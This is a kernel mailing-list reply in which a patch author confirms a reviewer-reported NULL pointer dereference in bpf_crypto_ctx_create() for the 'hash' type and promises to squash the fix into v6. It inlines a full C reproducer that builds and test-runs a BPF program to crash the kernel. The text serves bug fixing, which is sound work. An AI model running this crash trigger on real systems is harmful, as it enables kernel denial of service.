Hi,

> Can this cause a NULL pointer dereference when a BPF program calls
> bpf_crypto_ctx_create() with type="hash"?
>
> The bpf_crypto_ctx_create() function in kernel/bpf/crypto.c
> unconditionally calls type->setkey(), type->ivsize(), and
> type->statesize():
>
>     *err = type->setkey(ctx->tfm, params->key, params->key_len);
>     ...
>     ctx->siv_len = type->ivsize(ctx->tfm) + type->statesize(ctx->tfm);
>
> But bpf_crypto_shash_type does not implement these callbacks, leaving
> them as NULL.
>
> Note: This appears to be fixed later in the series by commit
> 76d771a64b50 ("bpf: Add hash kfunc for cryptographic hashing") which
> adds NULL checks before calling these function pointers. Should this
> commit be squashed with 76d771a64b50 to ensure each patch in the
> series is bisectable without introducing crashes?

Yes, confirmed.

I reproduced this on x86_64 with a sleepable BPF syscall program that
calls bpf_crypto_ctx_create() with:
- type = "hash"
- algo = "sha256"
- key_len = 1

That reaches the path where type->setkey/type->ivsize/type->statesize
are used without NULL checks for the hash type, and triggers the NULL
dereference as pointed out.

Below is the reproducer (inlined, no attachment):

--8<--
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/btf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

#define LOG_BUF_SIZE (1 << 20)

static int bpf_sys(enum bpf_cmd cmd, union bpf_attr *attr, unsigned int
size) {
        return syscall(__NR_bpf, cmd, attr, size);
}

static size_t btf_type_size(const struct btf_type *t)
{
        __u16 vlen = BTF_INFO_VLEN(t->info);
        __u32 kind = BTF_INFO_KIND(t->info);
        size_t sz = sizeof(*t);

        switch (kind) {
        case BTF_KIND_INT: sz += sizeof(__u32); break;
        case BTF_KIND_ARRAY: sz += sizeof(struct btf_array); break;
        case BTF_KIND_STRUCT:
        case BTF_KIND_UNION: sz += (size_t)vlen * sizeof(struct
        btf_member); break; case BTF_KIND_ENUM: sz += (size_t)vlen *
        sizeof(struct btf_enum); break; case BTF_KIND_FUNC_PROTO: sz +=
        (size_t)vlen * sizeof(struct btf_param); break; case
        BTF_KIND_VAR: sz += sizeof(struct btf_var); break; case
        BTF_KIND_DATASEC: sz += (size_t)vlen * sizeof(struct
        btf_var_secinfo); break; case BTF_KIND_DECL_TAG: sz +=
        sizeof(struct btf_decl_tag); break; case BTF_KIND_ENUM64: sz +=
        (size_t)vlen * sizeof(struct btf_enum64); break; default:
        break; } return sz;
}

static int find_vmlinux_func_btf_id(const char *func_name)
{
        int fd = -1, ret = -1;
        struct stat st;
        unsigned char *blob = NULL;
        struct btf_header *hdr;
        char *types, *strs;
        __u32 off, id;
        ssize_t n;
        size_t got = 0;

        fd = open("/sys/kernel/btf/vmlinux", O_RDONLY);
        if (fd < 0) goto out;
        if (fstat(fd, &st) < 0 || st.st_size <= 0) goto out;

        blob = malloc(st.st_size);
        if (!blob) goto out;

        while (got < (size_t)st.st_size) {
                n = read(fd, blob + got, (size_t)st.st_size - got);
                if (n < 0) {
                        if (errno == EINTR) continue;
                        goto out;
                }
                if (n == 0) break;
                got += (size_t)n;
        }
        if (got < sizeof(*hdr)) goto out;

        hdr = (struct btf_header *)blob;
        if (hdr->magic != BTF_MAGIC || hdr->version != BTF_VERSION)
        goto out; if ((size_t)hdr->hdr_len + hdr->type_off +
        hdr->type_len > got) goto out; if ((size_t)hdr->hdr_len +
        hdr->str_off + hdr->str_len > got) goto out;

        types = (char *)blob + hdr->hdr_len + hdr->type_off;
        strs = (char *)blob + hdr->hdr_len + hdr->str_off;

        for (off = 0, id = 1; off < hdr->type_len; id++) {
                struct btf_type *t = (struct btf_type *)(types + off);
                const char *name = t->name_off ? (strs + t->name_off) :
        ""; size_t sz = btf_type_size(t);

                if (sz == 0 || off + sz > hdr->type_len) goto out;
                if (BTF_INFO_KIND(t->info) == BTF_KIND_FUNC &&
                strcmp(name, func_name) == 0) { ret = (int)id;
                        goto out;
                }
                off += sz;
        }

out:
        free(blob);
        if (fd >= 0) close(fd);
        return ret;
}

int main(void)
{
        int create_id =
find_vmlinux_func_btf_id("bpf_crypto_ctx_create"); int release_id =
find_vmlinux_func_btf_id("bpf_crypto_ctx_release"); if (create_id <= 0
|| release_id <= 0) { fprintf(stderr, "failed resolving BTF IDs:
create=%d release=%d\n", create_id, release_id); return 1;
        }

        enum { PARAMS_BASE = 424, ERR_BASE = 16, PARAMS_SIZE = 408 };

        struct bpf_insn insn[128];
        int pc = 0, off;

        for (off = -8; off >= -424; off -= 8)
                insn[pc++] = (struct bpf_insn){
                        .code = BPF_ST | BPF_MEM | BPF_DW,
                        .dst_reg = BPF_REG_10,
                        .off = off,
                        .imm = 0,
                };

        insn[pc++] = (struct bpf_insn){ .code = BPF_ST | BPF_MEM |
        BPF_W, .dst_reg = BPF_REG_10, .off = -PARAMS_BASE + 0, .imm =
        0x68736168 }; insn[pc++] = (struct bpf_insn){ .code = BPF_ST |
        BPF_MEM | BPF_W, .dst_reg = BPF_REG_10, .off = -PARAMS_BASE +
        16, .imm = 0x32616873 }; insn[pc++] = (struct bpf_insn){ .code
        = BPF_ST | BPF_MEM | BPF_W, .dst_reg = BPF_REG_10, .off =
        -PARAMS_BASE + 20, .imm = 0x00003635 }; insn[pc++] = (struct
        bpf_insn){ .code = BPF_ST | BPF_MEM | BPF_B, .dst_reg =
        BPF_REG_10, .off = -PARAMS_BASE + 144, .imm = 0x11 };
        insn[pc++] = (struct bpf_insn){ .code = BPF_ST | BPF_MEM |
        BPF_W, .dst_reg = BPF_REG_10, .off = -PARAMS_BASE + 400, .imm =
        1 };

        insn[pc++] = (struct bpf_insn){ .code = BPF_ALU64 | BPF_MOV |
        BPF_X, .dst_reg = BPF_REG_1, .src_reg = BPF_REG_10 };
        insn[pc++] = (struct bpf_insn){ .code = BPF_ALU64 | BPF_ADD |
        BPF_K, .dst_reg = BPF_REG_1, .imm = -PARAMS_BASE }; insn[pc++]
        = (struct bpf_insn){ .code = BPF_ALU64 | BPF_MOV | BPF_K,
        .dst_reg = BPF_REG_2, .imm = PARAMS_SIZE }; insn[pc++] =
        (struct bpf_insn){ .code = BPF_ALU64 | BPF_MOV | BPF_X,
        .dst_reg = BPF_REG_3, .src_reg = BPF_REG_10 }; insn[pc++] =
        (struct bpf_insn){ .code = BPF_ALU64 | BPF_ADD | BPF_K,
        .dst_reg = BPF_REG_3, .imm = -ERR_BASE };

        insn[pc++] = (struct bpf_insn){ .code = BPF_JMP | BPF_CALL,
        .src_reg = BPF_PSEUDO_KFUNC_CALL, .imm = create_id };

        insn[pc++] = (struct bpf_insn){ .code = BPF_JMP | BPF_JEQ |
        BPF_K, .dst_reg = BPF_REG_0, .off = 2, .imm = 0 }; insn[pc++] =
        (struct bpf_insn){ .code = BPF_ALU64 | BPF_MOV | BPF_X,
        .dst_reg = BPF_REG_1, .src_reg = BPF_REG_0 }; insn[pc++] =
        (struct bpf_insn){ .code = BPF_JMP | BPF_CALL, .src_reg =
        BPF_PSEUDO_KFUNC_CALL, .imm = release_id };

        insn[pc++] = (struct bpf_insn){ .code = BPF_ALU64 | BPF_MOV |
        BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }; insn[pc++] = (struct
        bpf_insn){ .code = BPF_JMP | BPF_EXIT };

        char logbuf[LOG_BUF_SIZE];
        char lic[] = "GPL";
        union bpf_attr attr;
        memset(logbuf, 0, sizeof(logbuf));
        memset(&attr, 0, sizeof(attr));

        attr.prog_type = BPF_PROG_TYPE_SYSCALL;
        attr.prog_flags = BPF_F_SLEEPABLE;
        attr.insn_cnt = pc;
        attr.insns = (uint64_t)(uintptr_t)insn;
        attr.license = (uint64_t)(uintptr_t)lic;
        attr.log_level = 1;
        attr.log_size = sizeof(logbuf);
        attr.log_buf = (uint64_t)(uintptr_t)logbuf;
        memcpy(attr.prog_name, "poc_hash_bug", 12);

        int prog_fd = bpf_sys(BPF_PROG_LOAD, &attr, sizeof(attr));
        if (prog_fd < 0) {
                fprintf(stderr, "BPF_PROG_LOAD failed: errno=%d
        (%s)\n", errno, strerror(errno)); fprintf(stderr, "Verifier
        log:\n%s\n", logbuf); return 2;
        }

        union bpf_attr run;
        memset(&run, 0, sizeof(run));
        run.test.prog_fd = prog_fd;
        (void)bpf_sys(BPF_PROG_TEST_RUN, &run, sizeof(run));
        close(prog_fd);
        return 0;
}
--8<--

I agree this should be fixed at the patch granularity level. I will
squash the NULL-check fix into patch 2 in v6 so each patch remains
bisectable and does not introduce a crash window.

As this issue is already publicly discussed on bpf-next and raised by
CI review, replying on-list is appropriate.

Signed-off-by: XIAO WU <[email protected]>

Thanks

Reply via email to